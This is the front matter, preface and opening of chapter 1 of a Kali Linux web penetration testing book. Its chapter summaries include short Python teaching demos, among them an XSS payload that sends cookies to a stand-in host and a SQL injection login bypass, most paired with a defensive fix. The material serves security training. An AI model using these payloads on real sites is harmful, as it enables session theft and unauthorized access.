Mastering Kali Linux for Web Penetration Testing

Michael McPhee

Description

Master the art of exploiting advanced web penetration techniques with Kali Linux 2016.2

About This Book

  • Make the most of advanced web pen-testing techniques using Kali Linux 2016.2
  • Explore how Stored (a.k.a. Persistent) XSS attacks work and how to take advantage of them
  • Learn to secure your applications by performing advanced web-based attacks
  • Bypass internet security to traverse from the web to a private network

Who This Book Is For

This book targets IT pen testers, security consultants, and ethical hackers who want to expand their knowledge and gain expertise on advanced web penetration techniques. Prior knowledge of penetration testing would be beneficial.

What You Will Learn

  • Establish a fully-featured sandbox for test rehearsal and risk-free investigation of applications
  • Enlist open-source information to get a head-start on enumerating account credentials, mapping potential dependencies, and discovering unintended backdoors and exposed information
  • Map, scan, and spider web applications using nmap/zenmap, nikto, arachni, webscarab, w3af, and NetCat for more accurate characterization
  • Proxy web transactions through tools such as Burp Suite, OWASP's ZAP tool, and Vega to uncover application weaknesses and manipulate responses
  • Deploy SQL injection, cross-site scripting, Java vulnerabilities, and overflow attacks using Burp Suite, websploit, and SQLMap to test application robustness
  • Evaluate and test identity, authentication, and authorization schemes and sniff out weak cryptography before the black hats do

In Detail

You will start by delving into some common web application architectures in use, both in private and public cloud instances. You will also learn about the most common frameworks for testing, such as OWASP OTG version 4, and how to use them to guide your efforts. In the next section, you will be introduced to web pentesting with core tools and you will also see how to make web applications more secure through rigorous penetration tests using advanced features in open source tools. The book will then show you how to better hone your web pentesting skills in safe environments that can ensure low-risk experimentation with the powerful tools and features in Kali Linux that go beyond a typical script-kiddie approach. After establishing how to test these powerful tools safely, you will understand how to better identify vulnerabilities, position and deploy exploits, compromise authentication and authorization, and test the resilience and exposure applications possess.

By the end of this book, you will be well-versed with the web service architecture to identify and evade various protection mechanisms that are used on the Web today. You will leave this book with a greater mastery of essential test techniques needed to verify the secure design, development, and operation of your customers' web applications.

Style and approach

An advanced-level guide filled with real-world examples that will help you take your web application's security to the next level by using Kali Linux 2016.2.


Page count: 384

Publication year: 2017




 

Mastering Kali Linux for Web Penetration Testing

Test and evaluate all aspects of the design and implementation

Michael McPhee

BIRMINGHAM - MUMBAI

Mastering Kali Linux for Web Penetration Testing

Copyright © 2017 Packt Publishing

All rights reserved. No part of this book may be reproduced, stored in a retrieval system, or transmitted in any form or by any means, without the prior written permission of the publisher, except in the case of brief quotations embedded in critical articles or reviews.

 

Every effort has been made in the preparation of this book to ensure the accuracy of the information presented. However, the information contained in this book is sold without warranty, either express or implied. Neither the author, nor Packt Publishing, nor its dealers and distributors will be held liable for any damages caused or alleged to be caused directly or indirectly by this book.

 

Packt Publishing has endeavored to provide trademark information about all of the companies and products mentioned in this book by the appropriate use of capitals. However, Packt Publishing cannot guarantee the accuracy of this information.

 

First published: June 2017

 

Production reference: 1230617

Published by Packt Publishing Ltd.
Livery Place
35 Livery Street
Birmingham
B3 2PB, UK.

ISBN 978-1-78439-507-0

 

www.packtpub.com

Credits

Author  

Michael McPhee

Copy Editor  

Safis Editing

Reviewers  

 

Aamir Lakhani

Dave Frohnapfel

Project Coordinator  

Judie Jose

Commissioning Editor  

Vijin Boricha

Proofreader  

Safis Editing

Acquisition Editor  

Rahul Nair

Indexer  

Aishwarya Gangawane

Content Development Editor  

Abhishek Jadhav

Graphics  

Kirk D'Penha

Technical Editor  

Manish Shanbhag

Production Coordinator  

Aparna Bhagat

 

About the Author

Michael McPhee is a systems engineer at Cisco in New York, where he has worked for the last 4 years and has focused on cyber security, switching, and routing. Mike’s current role sees him consulting on security and network infrastructures, and he frequently runs clinics and delivers training to help get his customers up to speed. Suffering from a learning addiction, Mike has obtained the following certifications along the way: CEH, CCIE R&S, CCIE Security, CCIP, CCDP, ITILv3, and the Cisco Security White Belt. He is currently working on his VCP6-DV certification, following his kids to soccer games and tournaments, traveling with his wife and kids to as many places as possible, and scouting out his future all-grain beer home brewing rig. He also spends considerable time breaking his home network (for science!), much to the family's dismay.

Prior to joining Cisco, Mike spent 6 years in the U.S. Navy and another 10 working on communications systems as a systems engineer and architect for defense contractors, where he helped propose, design, and develop secure command and control networks and electronic warfare systems for the US DoD and NATO allies.

Prior publication:

Penetration Testing with the Raspberry Pi – Second Edition (with Jason Beltrame), Packt Publishing, November 2016.

 

To the Packt folks--thank you again for the support and for getting this book off the ground! I am blessed with the coolest team at my day job, where I receive a ton of support in pursuing all these extracurricular activities. The camaraderie from Eric Schickler and the awesome support of my manager, Mike Kamm, are especially helpful in keeping me on track and balancing my workload. In addition to my local teammates, any time I can get with my good friends, Jason Beltrame and Dave Frohnapfel, is the highlight of my week, and they have been a huge help in getting the gumption to tackle this topic. I’m lucky to have learned security at the feet of some awesome teachers, especially Mark Cairns, Bob Perciaccante, and Corey Schultz. For reasons that defy logic, Joey Muniz still sticks his neck out to support me, and I am forever in his debt--thanks dude! Lastly, I need to thank my family. Mom, you pretend to know what I am talking about and let me fortify your home network, thanks for always being so supportive. Liam and Claire--you two give me hope for the future. Keep asking questions, making jokes, and making us proud! Lastly, my beautiful wife, Cathy, keeps me healthy and happy despite myself, and the best anyone can hope for is to find a friend and partner as amazing as she is.

About the Reviewers

Aamir Lakhani is a leading senior security strategist. He is responsible for providing IT security solutions to major enterprises and government organizations.

Mr. Lakhani creates technical security strategies and leads security implementation projects for Fortune 500 companies. Industries of focus include healthcare providers, educational institutions, financial institutions, and government organizations. He has also assisted organizations in safeguarding IT and physical environments from attacks perpetrated by underground cybercrime groups. Mr. Lakhani is considered to be an industry leader for creating detailed security architectures within complex computing environments. His areas of expertise include cyber defense, mobile application threats, malware management, Advanced Persistent Threat (APT) research, and investigations relating to the internet's dark security movement. He is the author of or contributor to several books, and has appeared on FOX Business News, National Public Radio, and other media outlets as an expert on cyber security.

 

It was my pleasure working with the author and reviewing this book! They worked hard in putting together a quality product I will easily recommend. I also want to thank my dad and mom, Mahmood and Nasreen Lakhani, for always encouraging me to be my best. Thank you for always believing in me.

 

 

 

Dave Frohnapfel has over 10 years of experience in the engineering field, and his diverse background includes experience with a service provider, a global enterprise, and engineering design for a hardware manufacturer. In his current role at Cisco Systems, he is a leader in network security. Moreover, he is passionate about helping organizations address the evolving threat landscape and focusing on game-changing technology solutions. Before Cisco, he had extensive enterprise experience in building and maintaining large data centers and service delivery networks, and he managed an international operations staff.

www.PacktPub.com

For support files and downloads related to your book, please visit www.PacktPub.com.

Did you know that Packt offers eBook versions of every book published, with PDF and ePub files available? You can upgrade to the eBook version at www.PacktPub.com, and as a print book customer, you are entitled to a discount on the eBook copy. Get in touch with us at [email protected] for more details.

At www.PacktPub.com, you can also read a collection of free technical articles, sign up for a range of free newsletters and receive exclusive discounts and offers on Packt books and eBooks.

 

 

https://www.packtpub.com/mapt

 

Get the most in-demand software skills with Mapt. Mapt gives you full access to all Packt books and video courses, as well as industry-leading tools to help you plan your personal development and advance your career.

Why subscribe?

  • Fully searchable across every book published by Packt
  • Copy and paste, print, and bookmark content
  • On demand and accessible via a web browser

Customer Feedback

Thanks for purchasing this Packt book. At Packt, quality is at the heart of our editorial process. To help us improve, please leave us an honest review on this book's Amazon page at https://www.amazon.com/dp/1784395072.

 

If you'd like to join our team of regular reviewers, you can e-mail us at [email protected]. We award our regular reviewers with free eBooks and videos in exchange for their valuable feedback. Help us be relentless in improving our products!

Table of Contents

Preface

What this book covers

What you need for this book

Who this book is for

Conventions

Reader feedback

Customer support

Downloading the example code

Downloading the color images of this book

Errata

Piracy

Questions

Common Web Applications and Architectures

Common architectures

Standalone models

Three-tier models

Model-View-Controller design

Web application hosting

Physical hosting

Virtual hosting

Cloud hosting

Containers – a new trend

Application development cycles

Coordinating with development teams

Post deployment - continued vigilance

Common weaknesses – where to start

Web application defenses

Standard defensive elements

Additional layers

Summary

Guidelines for Preparation and Testing

Picking your favorite testing framework

Frameworks through a product

Train like you play

The EC-Council approach

The GIAC/SANS approach

The Offensive Security approach

Open source methodologies and frameworks

ISECOM's OSSTMM

ISSAF

NIST publications

OWASP's OTG

Keeping it legal and ethical

What is legal?

What is ethical?

Labbing - practicing what we learn

Creating a virtualized environment

Our penetration testing host

Creating a target-rich environment

Finding gullible servers

Unwitting clients

Summary

Stalking Prey Through Target Recon

The imitation game

Making (then smashing) a mirror with HTTrack

Making a stealthy initial archive

Tuning stealthier archives

Is the mirror complete and up-to-date?

Touring the target environment

Open source awesomeness

Open source Intel with Google and the Google hacking database

Tuning your Google search skills

Work smarter with the Google hacking DB and Netcraft

Mastering your own domain

Digging up the dirt

Digging record types

Getting fierce

Next steps with Nikto

Employing Maltego to organize

Being social with your target

Summary

Scanning for Vulnerabilities with Arachni

Walking into spider webs

Optimal Arachni deployment tips

An encore for stacks and frameworks

The Arachni test scenario

Profiles for efficiency

Creating a new profile

Scoping and auditing options

Converting social engineering into user input and mobile platform emulation

Fingerprinting and determining platforms

Checks (please)

Plugging into Arachni extensions and third-party add-ons

Browser clusters

Kicking off our custom scan

Reviewing the results

Summary

Proxy Operations with OWASP ZAP and Burp Suite

Pulling back the curtain with ZAP

Quick refresher on launching ZAP scans

Going active with ZAP

Passive ZAP scanning

Getting fuzzy with ZAP

Taking it to a new level with Burp Suite

Recon with Burp Suite

Stay on target!

Getting particular with proxy

Going active with Spider

Activating Burp Suite

Scanning for life (or vulnerabilities)

Passive scans are a no brainer

Active scanning – Use with care!

The flight of the intruder

Stop, enumerate, and listen!

Select, attack, highlight, and repeat!

Summary

Infiltrating Sessions via Cross-Site Scripting

The low-down on XSS types

Should XSS stay or should it go?

Location, location, and location!

XSS targeting and the delivery

Seeing is believing

Don't run with XSSer(s)!

Stored XSS with BeEF

Here, phishy phishy!

Let's go Metasploiting

Building your own payload

Every good payload needs a handler

Seal the deal – Delivering shell access

Metasploit's web-focused cousin – Websploit

Summary

Injection and Overflow Testing

Injecting some fun into your testing

Is SQL any good?

A crash course in DBs gone bad

Types of SQLI

In-band or classic SQLI

Blind SQLI

Stacked or compound SQLI

SQLI tool school

Old-school SQLI via browsers

Stepping it up with SQLMap

Cooking up some menu-driven SQLI with BBQSQL

SQLI goes high-class with Oracle

The X-factor - XML and XPath injections

XML injection

XPath injection

Credential Jedi mind tricks

Going beyond persuasion – Injecting for execution

Code injections

Overflowing fun

Commix - Not-so-funny command injections

Down with HTTP?

Summary

Exploiting Trust Through Cryptography Testing

How secret is your secret?

Assessing encryption like a pro

SSLyze - it slices, it scans…

SSLscan can do it!

Nmap has SSL skills too

Exploiting the flaws

POODLE – all bark, no bite (usually)

Heartbleed-ing out

DROWNing HTTPS

Revisiting the classics

Hanging out as the Man-in-the-Middle

Scraping creds with SSLstrip

Looking legit with SSLsniff and SSLsplit

SSLsniff

SSLsplit

Alternate MITM motives

Summary

Stress Testing Authentication and Session Management

Knock knock, who's there?

Does authentication have to be hard?

Authentication 2.0 - grabbing a golden ticket

The basic authentication

Form-based authentication

Digest-based authentication

Trust but verify

This is the session you are looking for

Munching on some cookies?

Don't eat fuzzy cookies

Jedi session tricks

Functional access level control

Refining a brute's vocabulary

Summary

Launching Client-Side Attacks

Why are clients so weak?

DOM, Duh-DOM DOM DOM!!

Malicious misdirection

Catch me if you can!

Picking on the little guys

Sea-surfing on someone else's board

Simple account takeovers

Don't you know who I am? Account creation

Trust me, I know the way!

I don't need your validation

Trendy hacks come and go

Clickjacking (bWAPP)

Punycode

Forged or hijacked certificates

Summary

Breaking the Application Logic

Speed-dating your target

Cashing in with e-commerce

Financial applications - Show me the money

Hacking human resources

Easter eggs of evil

So many apps to choose from…

Functional Feng Shui

Basic validation checks

Sometimes, less is more?

Forgery shenanigans

What does this button do?

Timing is everything

Reaching your functional limits

Do we dare to accept files?

Summary

Educating the Customer and Finishing Up

Finishing up

Avoiding surprises with constant contact

Establishing periodic updates

When to hit the big red button

Weaving optimism with your action plan

The executive summary

Introduction

Highlights, scoring, and risk recap

More on risk

Guidance - earning your keep

Detailed findings

The Dradis framework

MagicTree

Other documentation and organization tools

Graphics for your reports

Bringing best practices

Baking in security

Honing the SDLC

Role-play - enabling the team

Picking a winner

Plans and programs

More on change management

Automate and adapt

Assessing the competition

Backbox Linux

Samurai web testing framework

Fedora Security Spin

Other Linux pen test distros

What about Windows and macOS?

Summary

Preface

Web applications are where customers and businesses meet. A very large proportion of internet traffic now flows between servers and clients, and the power and trust placed in each application, combined with its exposure to the outside world, makes web apps a popular target for adversaries seeking to steal data, eavesdrop, or cripple businesses and institutions. As penetration testers, we need to think like the attacker to better understand, test, and make recommendations for improving those web apps. There are many tools to fit any budget, but Kali Linux is a fantastic, industry-leading open source distribution that provides many of these functions for free. The tools Kali provides, along with standard browsers and appropriate plugins, enable us to tackle most web penetration testing scenarios. Several organizations also provide wonderful training environments that can be paired with a Kali pen testing box, ensuring low-risk experimentation with powerful tools and features in Kali Linux that go beyond a typical script-kiddie approach. This approach assists ethical hackers in responsibly exposing, identifying, and disclosing weaknesses and flaws in web applications at all stages of development. Having learned to use these powerful tools safely, you will understand how to better identify vulnerabilities, position and deploy exploits, compromise authentication and authorization, and test the resilience and exposure applications possess. In the end, your customers will be better served with actionable intelligence and guidance that will help them secure their applications and better protect their users, information, and intellectual property.

What this book covers

Chapter 1, Common Web Applications and Architectures, reviews some common web application architectures and hosting paradigms to help us identify the potential weaknesses and select the appropriate test plan.

Chapter 2, Guidelines for Preparation and Testing, helps us understand the many sources of requirements for our testing (ethical, legal, and regulatory) and how to select the appropriate testing methodology for a scenario or customer.

Chapter 3, Stalking Prey Through Target Recon, introduces open source intelligence gathering and passive recon methods to help map out a target and its attack surface.

Chapter 4, Scanning for Vulnerabilities with Arachni, discusses one of the purpose-built vulnerability scanners included in Kali that can help us conduct scans of even the largest applications and build fantastic reports.

Chapter 5, Proxy Operations with OWASP ZAP and Burp Suite, dives into proxy-based tools to show how they can not only actively scan, but passively intercept and manipulate messages to exploit many vulnerabilities.
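To make the intercept-and-manipulate idea concrete, here is a minimal, hedged sketch in plain Python of the core proxy operation: rewriting a captured request's headers before it is forwarded. This is not how ZAP or Burp is implemented internally, and the request, host, and cookie values are invented for illustration:

```python
def set_header(raw_request, name, value):
    """Replace (or add) a header in a raw HTTP/1.1 request, the way an
    intercepting proxy edits a message before forwarding it."""
    head, _, body = raw_request.partition("\r\n\r\n")
    lines = head.split("\r\n")
    request_line, headers = lines[0], lines[1:]
    # Drop any existing header of the same name (case-insensitive),
    # then append the replacement.
    headers = [h for h in headers
               if not h.lower().startswith(name.lower() + ":")]
    headers.append("%s: %s" % (name, value))
    return "\r\n".join([request_line] + headers) + "\r\n\r\n" + body

# A captured request (hypothetical host and session cookie):
raw = ("GET /account HTTP/1.1\r\n"
       "Host: target.example\r\n"
       "Cookie: session=abc123\r\n\r\n")

# Swap in a different session token before the request goes out:
print(set_header(raw, "Cookie", "session=VICTIM"))
```

A real proxy does this between two sockets, of course, but the header rewrite itself is exactly this kind of string surgery.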

Chapter 6, Infiltrating Sessions via Cross-Site Scripting, explores how we can test and implement Cross Site Scripting (XSS) to both compromise the client and manipulate the information flows for other attacks. Tools such as BeEF, XSSer, Websploit, and Metasploit are discussed in this chapter.
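The root cause every XSS tool exploits is user input echoed into a page without encoding. As a hedged illustration, using Python's standard html module rather than any tool from the chapter, and a hypothetical comment-rendering function:

```python
import html

def render_comment_vulnerable(comment):
    # User input is echoed into the page verbatim.
    return "<div class='comment'>%s</div>" % comment

def render_comment_safe(comment):
    # Escaping turns markup characters into inert HTML entities.
    return "<div class='comment'>%s</div>" % html.escape(comment)

# A stored-XSS-style payload that would exfiltrate the session cookie:
payload = ("<script>document.location="
           "'http://evil.example/?c='+document.cookie</script>")

print(render_comment_vulnerable(payload))  # <script> survives intact
print(render_comment_safe(payload))        # rendered as harmless text
```

If the first form is what a comment field produces, every visitor who views the stored comment runs the attacker's script; the second form displays the payload as text.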

Chapter 7, Injection and Overflow Testing, looks into how we can test for various forms of unvalidated input (for example, SQL, XML, LDAP, and HTTP) that have the potential to reveal inappropriate information, escalate privileges, or otherwise damage an application's servers or modules. We'll see how Commix, BBQSQL, SQLMap, SQLninja, and SQLsus can help.
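The flaw these tools automate finding can be reduced to a few lines. This sketch uses Python's built-in sqlite3 with a throwaway in-memory database (the table and credentials are invented) to contrast a query built by string concatenation with a parameterized one:

```python
import sqlite3

# A throwaway in-memory database with one user.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('alice', 's3cret')")

def login_vulnerable(name, password):
    # DON'T do this: user input is concatenated straight into the SQL.
    query = ("SELECT name FROM users WHERE name = '%s' "
             "AND password = '%s'" % (name, password))
    return db.execute(query).fetchall()

def login_safe(name, password):
    # Parameterized query: input can never change the SQL structure.
    return db.execute(
        "SELECT name FROM users WHERE name = ? AND password = ?",
        (name, password)).fetchall()

# Classic in-band SQLi: the password check is short-circuited.
payload = "' OR '1'='1"
print(login_vulnerable("alice", payload))  # logs in without the password
print(login_safe("alice", payload))        # returns nothing
```

Tools such as SQLMap essentially probe for the first pattern by sending payloads like this one and watching how the application's responses change.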

Chapter 8, Exploiting Trust Through Cryptography Testing, helps us see how we can tackle testing the strength that encryption applications may be using to protect the integrity and privacy of their communications with clients. Our tools of interest will be SSLstrip, SSLScan, SSLsplit, SSLyze, and SSLsniff.
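Scanners such as SSLyze check many properties at once; one small piece, the certificate validity window, can be sketched with Python's standard ssl module. The notAfter date below is invented for illustration:

```python
import ssl
import time

def cert_is_expired(not_after, now=None):
    # 'notAfter' strings in certificates look like: 'Jun 27 12:00:00 2018 GMT'
    expiry = ssl.cert_time_to_seconds(not_after)
    current = now if now is not None else time.time()
    return current > expiry

not_after = "Jun 27 12:00:00 2018 GMT"

# Checked against a mid-2017 clock (epoch 1500000000), the cert is valid:
print(cert_is_expired(not_after, now=1500000000.0))  # False
# Checked against today's clock, it has long since expired:
print(cert_is_expired(not_after))                    # True
```

In a live assessment the notAfter string would come from the peer certificate retrieved during the TLS handshake; here it is supplied directly so the check itself is the focus.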

Chapter 9, Stress Testing Authentication and Session Management, tackles the testing of various vulnerabilities and schemes focused on how web apps determine who is who and what they are entitled to see or access. Burp will be the primary tool of interest.
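As a quick illustration of why some of these schemes need stress testing: HTTP Basic authentication only base64-encodes credentials, so anyone who can observe the request (no TLS, a proxy, a log file) can recover them. A minimal sketch, with an invented username and password:

```python
import base64

# What a browser sends for HTTP Basic authentication:
creds = "alice:s3cret"
header = "Authorization: Basic " + base64.b64encode(creds.encode()).decode()
print(header)

# Base64 is an encoding, not encryption: reversing it is trivial.
token = header.split()[-1]
print(base64.b64decode(token).decode())  # alice:s3cret
```

This is why Basic authentication is only defensible over a well-configured HTTPS connection, and why a tester who can capture traffic checks for it first.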

Chapter 10, Launching Client-Side Attacks, focuses on how to test for vulnerabilities (CSRF, DOM-XSS, and so on) that allow attackers to compromise a client and either steal its information or alter its behavior, whereas the earlier chapters dealt with testing the servers and applications themselves. JavaScript and other forms of implant will be the focus.
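CSRF works because browsers attach session cookies to requests automatically, no matter which page triggered them. The common defense, a per-session token that an attacker's page cannot read, can be sketched as follows; this is a hedged illustration with hypothetical names, not a production implementation:

```python
import hashlib
import hmac
import secrets

SECRET_KEY = secrets.token_bytes(32)  # server-side secret (hypothetical app)

def issue_csrf_token(session_id):
    # Bind the token to the session so a cross-site page cannot forge it.
    return hmac.new(SECRET_KEY, session_id.encode(),
                    hashlib.sha256).hexdigest()

def verify_csrf_token(session_id, token):
    expected = issue_csrf_token(session_id)
    # Constant-time comparison avoids leaking information via timing.
    return hmac.compare_digest(expected, token)

token = issue_csrf_token("session-1234")
print(verify_csrf_token("session-1234", token))    # True
print(verify_csrf_token("session-1234", "forged")) # False
```

When testing, the interesting cases are applications that omit the token on state-changing requests, accept an empty token, or fail to bind it to the session.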

Chapter 11, Breaking the Application Logic, explains how to test for a variety of flaws in the business logic of an application. Important as this testing is, it requires a significant understanding of what the app intends and how it is implemented.
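A classic example of broken application logic is a checkout that trusts a client-supplied total, something a tester can manipulate through an intercepting proxy. A hedged sketch with an invented catalog and prices:

```python
# Hypothetical server-side catalog.
CATALOG = {"widget": 25.00, "gadget": 60.00}

def checkout_vulnerable(cart, client_total):
    # Flaw: whatever total the client's request body claims is charged.
    return client_total

def checkout_safe(cart, client_total):
    # The server recomputes the price from its own catalog and ignores
    # the client-supplied figure.
    return sum(CATALOG[item] * qty for item, qty in cart.items())

cart = {"widget": 2, "gadget": 1}
tampered_total = 0.01  # the attacker edits the request in a proxy

print(checkout_vulnerable(cart, tampered_total))  # 0.01
print(checkout_safe(cart, tampered_total))        # 110.0
```

No scanner finding flags this by itself; spotting it takes exactly the understanding of intent versus implementation that this chapter emphasizes.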

Chapter 12, Educating the Customer and Finishing Up, wraps up the book with a look at providing useful and well-organized guidance and insights to the customer. This chapter also looks at complementary or alternate toolsets worth a look.

What you need for this book

Hardware list:

The exercises performed in this book and the tools used can be deployed on any modern Windows, Linux, or Mac OS machine capable of running a suitable virtualization platform and a more recent version of the OS. Suggested minimum requirements should allow for at least the following resources to be available to your virtual platforms:

  • 4 virtual CPUs
  • 4-8 GB of RAM
  • 802.3 Gigabit Ethernet, shared with host machine
  • 802.11a/g/n/ac WiFi link, shared with host machine

Software list:

Desktop/Laptop Core OS and Hypervisor:

Virtualization should be provided by one of Kali Linux's supported hypervisors, namely one of the following options. The operating system and hardware will need to support the minimum requirements, with an eye toward dedicating the previous hardware recommendations to the guest virtual machines:

For Windows:

  • VMware Workstation Pro 12 or newer (Player does not support multiple VMs at a time): http://www.vmware.com/products/workstation.html
  • VirtualBox 5.1 or newer: https://www.virtualbox.org/wiki/Downloads

For Mac OS:

  • VMware Fusion 7.X or newer: http://www.vmware.com/products/fusion.html
  • Parallels 12 for Mac: http://www.parallels.com/products/desktop/
  • VirtualBox 5.1 or newer: https://www.virtualbox.org/wiki/Downloads

For Linux:

  • VMware Workstation 12 or newer (Player does not support multiple VMs at a time): http://www.vmware.com/products/workstation-for-linux.html
  • VirtualBox 5.1 or newer: https://www.virtualbox.org/wiki/Downloads

For Barebones Hypervisors:

  • VMware ESXi/vSphere 5.5 or newer
  • Microsoft Hyper-V 2016
  • Red Hat KVM/sVirt 5 or newer

Applications and virtual machines:

Essential:

  • Kali Linux VM (choose 64-bit VM, VBox, or Hyper-V image): https://www.offensive-security.com/kali-linux-vmware-virtualbox-image-download/

Alternatives:

  • Kali Linux ISO (64-bit, for VirtualBox or Parallels): https://www.kali.org/downloads/

Target VMs:

  • OWASP Broken Web Application: https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project
  • Metasploitable 2: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
  • Metasploitable 3: https://community.rapid7.com/community/metasploit/blog/2016/11/15/test-your-might-with-the-shiny-new-metasploitable3
  • Bee-Box: http://www.itsecgames.com
  • Damn Vulnerable Web Application (DVWA): http://www.dvwa.co.uk
  • OWASP Mutillidae 2: https://sourceforge.net/projects/mutillidae/files/
  • Windows Eval Mode OS + Browser: https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

Who this book is for

This book is focused on IT pentesters, security consultants, and ethical hackers who want to expand their knowledge and gain expertise on advanced web penetration techniques. Prior knowledge of penetration testing will be beneficial.

Reader feedback

Feedback from our readers is always welcome. Let us know what you think about this book-what you liked or disliked. Reader feedback is important for us as it helps us develop titles that you will really get the most out of.

To send us general feedback, simply e-mail [email protected], and mention the book's title in the subject of your message.

If there is a topic that you have expertise in and you are interested in either writing or contributing to a book, see our author guide at www.packtpub.com/authors.

Customer support

Now that you are the proud owner of a Packt book, we have a number of things to help you to get the most from your purchase.

Downloading the example code

You can download the example code files for this book from your account at http://www.packtpub.com. If you purchased this book elsewhere, you can visit http://www.packtpub.com/support and register to have the files e-mailed directly to you.

You can download the code files by following these steps:

1. Log in or register to our website using your e-mail address and password.
2. Hover the mouse pointer on the SUPPORT tab at the top.
3. Click on Code Downloads & Errata.
4. Enter the name of the book in the Search box.
5. Select the book for which you're looking to download the code files.
6. Choose from the drop-down menu where you purchased this book from.
7. Click on Code Download.

Once the file is downloaded, please make sure that you unzip or extract the folder using the latest version of:

  • WinRAR / 7-Zip for Windows
  • Zipeg / iZip / UnRarX for Mac
  • 7-Zip / PeaZip for Linux

The code bundle for the book is also hosted on GitHub at https://github.com/PacktPublishing/Mastering-Kali-Linux-for-Web-Penetration-Testing. We also have other code bundles from our rich catalog of books and videos available at https://github.com/PacktPublishing/. Check them out!

Downloading the color images of this book

We also provide you with a PDF file that has color images of the screenshots/diagrams used in this book. The color images will help you better understand the changes in the output. You can download this file from https://www.packtpub.com/sites/default/files/downloads/MasteringKaliLinuxforWebPenetrationTesting_ColorImages.pdf.

Errata

Although we have taken every care to ensure the accuracy of our content, mistakes do happen. If you find a mistake in one of our books-maybe a mistake in the text or the code-we would be grateful if you could report this to us. By doing so, you can save other readers from frustration and help us improve subsequent versions of this book. If you find any errata, please report them by visiting http://www.packtpub.com/submit-errata, selecting your book, clicking on the Errata Submission Form link, and entering the details of your errata. Once your errata are verified, your submission will be accepted and the errata will be uploaded to our website or added to any list of existing errata under the Errata section of that title.

To view the previously submitted errata, go to https://www.packtpub.com/books/content/support and enter the name of the book in the search field. The required information will appear under the Errata section.

Piracy

Piracy of copyrighted material on the Internet is an ongoing problem across all media. At Packt, we take the protection of our copyright and licenses very seriously. If you come across any illegal copies of our works in any form on the Internet, please provide us with the location address or website name immediately so that we can pursue a remedy.

Please contact us at [email protected] with a link to the suspected pirated material.

We appreciate your help in protecting our authors and our ability to bring you valuable content.

Questions

If you have a problem with any aspect of this book, you can contact us at [email protected], and we will do our best to address the problem.

Common Web Applications and Architectures

Web applications are essential to today's civilization. I know this sounds bold, but when you think of how the technology has changed the world, there is no doubt that the rapid exchange of information across great distances via the internet has driven globalization in large parts of the world. While the internet is many things, its most inherently valuable components are those where data resides. Since the advent of the World Wide Web in the 1990s, this data has exploded, with the world now generating more data every two years than in all of prior recorded history. While databases and object storage are the main repositories for this staggering amount of data, web applications are the portals through which that data comes and goes, is manipulated, and is processed into actionable information. This information is presented to end users dynamically in their browsers, and the relative simplicity and access this provides are the leading reasons why web applications are impossible to avoid. We're so accustomed to web applications that many of us would find it impossible to go more than a few hours without them.

Financial, manufacturing, government, defense, business, educational, and entertainment institutions depend on the web applications that allow them to function and interact with each other. These ubiquitous portals are trusted to store, process, exchange, and present all sorts of sensitive information and valuable data while safeguarding it from harm. The industrial world has placed a great deal of trust in these systems, so any damage to them or any violation of that trust can and often does cause far-reaching economic, political, or physical damage, and can even lead to loss of life. The news is riddled with reports of compromised web applications every day. Each of these attacks erodes that trust as data (from financial and health information to intellectual property) is stolen, leaked, abused, and disclosed. Companies have been irreparably harmed, patients endangered, careers ended, and destinies altered. This is heavy stuff!

While there are many potential issues that keep architects, developers, and operators on edge, many of these have a very low probability of occurring – with one great exception. Criminal and geopolitical actors and activists present a clear danger to computing systems, networks, and all other people or things that are attached to or make use of them. Bad coding, improper implementation, or missing countermeasures are a boon to these adversaries, offering a way in or providing cover for their activities. As potential attackers see the opportunity to wreak havoc, they invest more, educate themselves, develop new techniques, and then achieve more ambitious goals. This cycle repeats itself. Defending networks, systems, and applications against these threats is a noble cause.

Defensive approaches also exist that can help reduce risks and minimize exposure, but it is the penetration tester (also known as the White Hat Hacker) that ensures that they are up to the task. By thinking like an attacker - and using many of the same tools and techniques - a pen tester can uncover latent flaws in the design or implementation and allow the application stakeholders to fill these gaps before the malicious hacker (also known as the Black Hat Hacker) can take advantage of them. Security is a journey, not a destination, and the pen tester can be the guide leading the rest of the stakeholders to safety.

In this book, I'll assume that you are an interested or experienced penetration tester who wants to specifically test web applications using Kali Linux, the most popular open source penetration testing platform today. The basic setup and installation of Kali Linux and its tools is covered in many other places, be it Packt's own Web Penetration Testing with Kali Linux - Second Edition (by Juned Ahmed Ansari, available at https://www.packtpub.com/networking-and-servers/web-penetration-testing-kali-linux-second-edition) or one of a large number of books and websites.

In this first chapter, we'll take a look at the following:

Leading web application architectures and trends

Common web application platforms

Cloud and privately hosted solutions

Common defenses

A high-level view of architectural soft spots that we will evaluate as we progress through this book

Common architectures

Web applications have evolved greatly over the last 15 years, moving from their early monolithic designs to the segmented approaches that now dominate professionally deployed instances. They have also seen a shift in how the elements of the architecture are hosted: from purely on-premises servers, to virtualized instances, to today's pure or hybrid cloud deployments. We should also understand that the client's role in this architecture can vary greatly. This evolution has improved scale and availability, but the additional complexity and variability involved can work against less diligent developers and operators.

The overall web application architecture may be physically, logically, or functionally segmented. These types of segmentation may occur in combination, and with cross-application integration so prevalent in enterprises, these boundaries are likely to be in a constant state of transition. This segmentation serves to improve scalability and modularity, split management domains to match personnel or team structures, and increase availability, and it can also offer some much-needed containment in the event of a compromise. The degree to which this modularity occurs, and how the functions are divided logically and physically, depends greatly on the framework that is used.

Let's discuss some of the more commonly used logical models as well as some of the standout frameworks that these models are implemented on.

Standalone models

Most small or ad hoc web applications begin life hosted on a single physical or virtual server as a monolithic installation; this is commonly encountered in simpler self-hosted applications such as small or medium business web pages, inventory services, ticketing systems, and so on. As these applications or their associated databases grow, it becomes necessary to separate the components or modules to better support the scale and to integrate with adjacent applications and data stores.

These applications tend to use commonly available turnkey web frameworks such as Drupal, WordPress, Joomla!, Django, or a multitude of others. Each framework combines a content delivery manager, a language platform (for example, Java, PHP: Hypertext Preprocessor (PHP), or Active Server Pages (ASP.NET)), generated content in Hyper Text Markup Language (HTML), and one or more supported database types (various Structured Query Language (SQL) databases, Oracle, IBM DB2, or even flat files and Microsoft Access databases). Available as a single image or install medium, all functions reside within the same operating system and memory space. The platform and database combination selected for this model is often more a question of developer competencies and preferences than anything else. Social engineering and open source information gathering on the responsible teams will certainly assist in characterizing the architecture of the web application.
